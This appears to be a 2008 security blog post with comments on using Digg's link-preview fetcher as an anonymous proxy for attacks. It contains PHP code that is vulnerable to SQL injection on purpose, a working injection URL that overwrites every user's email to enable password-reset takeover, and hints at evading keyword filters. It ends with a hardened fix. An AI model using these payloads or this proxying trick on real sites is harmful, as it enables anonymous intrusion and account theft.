Making Digg Attack Sites For You

July 6th, 2008 | by blank89

People have hacked Digg before. One researcher found an XSS flaw that let him force users to Digg his articles. Digg patched the problem and went on with its business. However, there is another problem with Digg, in its content parsing system. The difference is that it doesn’t compromise Digg’s own system; it makes Digg compromise other systems.

The problem is that users can submit URLs that have attacks embedded in them. When Digg fetches the submitted page to extract the title, description, images and so on, the request carrying the attack is made by Digg’s server, and that is where the attack is executed. What is the advantage of this? Anonymity. Digg acts as a proxy, allowing an attack to be performed without ever connecting directly to the target server.

If the article ended here, it wouldn’t be very exciting though, would it? I cooked up an example application and attack for you. Here is the server-side source code that is vulnerable to SQL injection.

<html>
<head><title>This script is vulnerable to sql injection</title></head>
<body>
<form action="sqlinjection.php" method="GET">
User: <input type="text" name="user" /><br />
Email: <input type="text" name="email" />
<input type="submit" value="Inject" />
</form>
</body>
</html>
<?php
// Connect to the database.
// mysql_error() will be useful to play around with other injection examples.
mysql_connect("localhost", "username", "password") or die(mysql_error());
mysql_select_db("database") or die(mysql_error());
// stripslashes() undoes magic_quotes for demonstration purposes, so the raw
// quote characters reach the query string untouched.
$user = stripslashes($_GET['user']);
$email = stripslashes($_GET['email']);
// The query that the injection is performed on: user input is concatenated
// straight into the SQL text.
echo $query = "UPDATE users SET email='$email' WHERE user='$user'"; // print the query for testing purposes
$result = mysql_query($query) or die(mysql_error());
?>

The next thing we need to do is submit an attack URL to Digg. Remember, you don’t actually have to complete the submission; just wait until the parsing screen shows up and asks you for a title and description. At that point, the attack has already happened.

Now submit the following URL to Digg:

http://www.example.com/sqlinjection.php?user=asdf%27+OR+%271%27%3D%271&email=hacked%40hacked.com

The query then becomes:

UPDATE users SET email='hacked@hacked.com' WHERE user='asdf' OR '1'='1'

[Screenshot: Submit the link to Digg]

And look at the database:

[Screenshot: The hacked database]

All the email addresses are changed to hacked@hacked.com! Anyone with that email address could easily reset the passwords. Using Google to find SQL injection vulnerabilities, Digg to execute them and a free email account to collect the password resets, you never have to actually connect to the server to hack it.

It’s actually not fair to Digg to pretend that it’s the only system with this problem. The same trick can be done by posting a link in a forum or using a similar article submission system. The difference is that Digg does the parsing immediately, allowing the attack to be performed in real time.
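Since a link-preview fetcher like Digg’s can only ever issue a plain GET for whatever URL it is handed, the fix belongs on the target site, not on Digg. The following is an added example (not code from the original post) showing the same “update e-mail” handler hardened in two ways: it refuses state-changing requests that are not POSTs, and it uses a PDO prepared statement so the `asdf' OR '1'='1` payload is compared literally against the `user` column instead of being spliced into the SQL text. The DSN, the credentials and the `users(user, email)` table are assumptions carried over from the vulnerable script.

```php
<?php
// Added example, not part of the original post: the hardened version of
// sqlinjection.php. Assumes a MySQL database reachable via PDO with the same
// credentials and `users` table as the vulnerable script above.
declare(strict_types=1);

// 1. A state-changing action must not be reachable by GET. A preview fetcher
//    (Digg, a forum link expander, a crawler) only issues GET, so requiring POST
//    takes this handler out of their reach entirely.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    header('Allow: POST');
    exit('This endpoint only accepts POST');
}

// 2. No stripslashes()/magic_quotes games: read the raw input and validate it.
$user  = $_POST['user']  ?? '';
$email = $_POST['email'] ?? '';

if ($user === '' || strlen($user) > 64) {
    http_response_code(400);
    exit('invalid user');
}
if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
    http_response_code(400);
    exit('invalid email');
}

// 3. Prepared statements keep the query text and the data apart. With
//    emulated prepares disabled, the server receives the statement and the
//    parameters separately, so a value such as  asdf' OR '1'='1  can never
//    change the WHERE clause; it simply matches no row.
$pdo = new PDO(
    'mysql:host=localhost;dbname=database;charset=utf8mb4', // assumed DSN
    'username',                                              // assumed credentials
    'password',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

$stmt = $pdo->prepare('UPDATE users SET email = :email WHERE user = :user');
$stmt->execute([':email' => $email, ':user' => $user]);

// 4. Never echo the query or the driver's error text to the client; keep
//    diagnostics in the server log where an attacker cannot read them.
$affected = $stmt->rowCount();
error_log(sprintf('email update for user=%s affected %d row(s)', $user, $affected));
echo $affected === 1 ? 'updated' : 'no such user';
```

With this version, submitting the article’s attack URL to Digg (or to any other fetcher) produces a 405 from step 1 before any database work happens, and even a POST carrying the same payload updates at most the single row whose `user` column literally equals the submitted string.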


5 Responses to “Making Digg Attack Sites For You”

By sdadadsadfads on Jul 6, 2008:

    They can fix the anonymity problem by sending an X-Forwarded-For header.

    …but I bet they’ll ban submissions with “SELECT” and “DROP” in the query string instead.

By blank89 on Jul 6, 2008:

    They could reduce the anonymity a bit by sending the original IP address, but that doesn’t mean the server on the other end will log it. What if they use a proxy to create an account on Digg? It’s an easy way to chain out from there.

    The problem with banning submissions with SELECT and DROP is that some legitimate articles might have these key words.

By blank89 on Jul 6, 2008:

    That also doesn’t guarantee the safety of the link. You can take advantage of SQL functions and encode strings that are decoded once the database executes the statement.

By eagad on Jul 7, 2008:

    I guess the moral of the story is that it is very important to secure your own site so that sites like Digg can’t be used against you.

By blank89 on Jul 7, 2008:

    Note that this will only work on GET variables, which is another reason to use POST for as many things as possible.
